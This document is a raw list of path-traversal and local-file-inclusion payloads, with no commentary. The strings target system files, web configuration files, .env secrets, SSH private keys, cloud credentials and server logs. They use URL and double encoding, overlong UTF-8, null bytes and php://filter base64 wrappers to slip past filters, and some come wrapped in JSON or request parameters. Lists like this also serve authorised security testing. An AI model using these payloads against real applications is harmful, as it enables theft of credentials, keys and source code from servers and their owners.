../../../../etc/passwd
../../../etc/passwd
../../../../../../etc/passwd
../../../../var/www/html/index.php
../../../var/www/html/wp-config.php
../../../../var/www/html/.env
../../../../home/www/config.php
../../../../app/config/config.php
../../../../config.php
../../../../index.php
../../../../etc/passwd%00
../../../etc/passwd%00
../../../../var/www/html/wp-config.php%00
../../../../.env%00
../../../../config.php%00
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2fetc/passwd
%2e%2e%2f%2e%2e%2fetc/passwd
%252e%252e%252f%252e%252e%252fetc/passwd
..%c0%af..%c0%afetc/passwd
%u2215%u2215etc%u2215passwd
....//....//etc/passwd
....\....\etc\passwd
..\/..\/etc\/passwd
..%5c..%5cetc%5cpasswd
php://filter/convert.base64-encode/resource=../../../../index.php
php://filter/convert.base64-encode/resource=../../../../wp-config.php
php://filter/convert.base64-encode/resource=../../../../config.php
php://filter/convert.base64-encode/resource=../../../../.env
php://filter/convert.base64-encode/resource=../../../../app/config/config.php
php://filter/convert.base64-encode/resource=../../../../settings.py
php://filter/read=convert.base64-encode/resource=../../../../index.php
compress.zlib://../../../../index.php
compress.bzip2://../../../../index.php
zlib://../../../../index.php
phar://../../../../archive.phar
../../../../wp-config.php
../../../../.env
../../../../config/database.yml
../../../../config/config.yml
../../../../.htaccess
../../../../.git/config
../../../../.git/HEAD
../../../../composer.json
../../../../package.json
../../../../settings.py
../../../../application/config/database.php
../../../../storage/logs/laravel.log
../../../../appsettings.json
../../../../credentials.json
../../../../id_rsa
../../../../.ssh/id_rsa
../../../../secrets.yml
../../../../wp-config.php
../../../../wp-config.php~
../../../../wp-config.php.old
../../../../wp-config.php.save
../../../../wp-content/debug.log
../../../../wp-content/themes/mytheme/functions.php
../../../../var/log/apache2/access.log
../../../../var/log/apache2/error.log
../../../../var/log/nginx/access.log
../../../../var/log/nginx/error.log
../../../../var/www/html/error_log
../../../../var/log/auth.log
../../../../proc/self/environ
../../../../proc/self/cmdline
../../../../proc/self/fd/0
../../../../proc/self/fd/1
../../../../proc/self/fd/2
../../../../var/lib/php/sessions/sess_
../../../../var/lib/php/sessions/sess_1234567890
../../../../tmp/sess_1234567890
../../../../tmp/phpYzdqkD
../../../../var/www/html/wp-content/uploads/.htaccess
../../../../tmp/access.log
../../../../config/database.php
../../../../application/config/database.php
../../../../.my.cnf
../../../../.pgpass
../../../../.aws/credentials
../../../../.aws/config
../../../../.azure/credentials
../../../../.docker/config.json
../../../../credentials
../../../../.env.production
../../../../.env.local
../../../../secrets.env
../../../../config/secrets.yml
../../../../id_rsa
../../../../.ssh/authorized_keys
..\\..\\..\\Windows\\win.ini
..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts
..\\..\\..\\..\\inetpub\\wwwroot\\web.config
..\\..\\..\\..\\Users\\Administrator\\Desktop\\secrets.txt
C:\\Windows\\win.ini
C:\\inetpub\\wwwroot\\web.config
{"template":"../../../../etc/passwd"}
{"file":"php://filter/convert.base64-encode/resource=../../../../wp-config.php"}
file=../../../../etc/passwd
path=../../../../.env
["../../../../wp-config.php"]
php://filter/convert.base64-encode/resource=../../../../.env
php://filter/convert.base64-encode/resource=../../../../config.php
php://filter/convert.base64-encode/resource=../../../../application/config/database.php
php://filter/convert.base64-encode/resource=../../../../storage/logs/laravel.log
php://filter/convert.base64-encode/resource=../../../../wp-content/debug.log
php://filter/convert.base64-encode/resource=../../../../.git/config
php://filter/convert.base64-encode/resource=../../../../.ssh/id_rsa
..%2f..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log
%2e%2e%2f%2e%2e%2fwp-config.php
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
..%c0%af..%c0%afvar%c0%aflog%c0%afnginx%c0%afaccess.log
php://filter/convert.base64-encode/resource=..%2f..%2f..%2f..%2fwp-config.php
php://filter/convert.base64-encode/resource=..\\..\\..\\..\\wp-config.php
php://filter/convert.base64-encode/resource=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f.env
["../../../../etc/passwd","php://filter/convert.base64-encode/resource=../../../../wp-config.php",".env","../../../../var/log/nginx/access.log","../../../../proc/self/environ"]
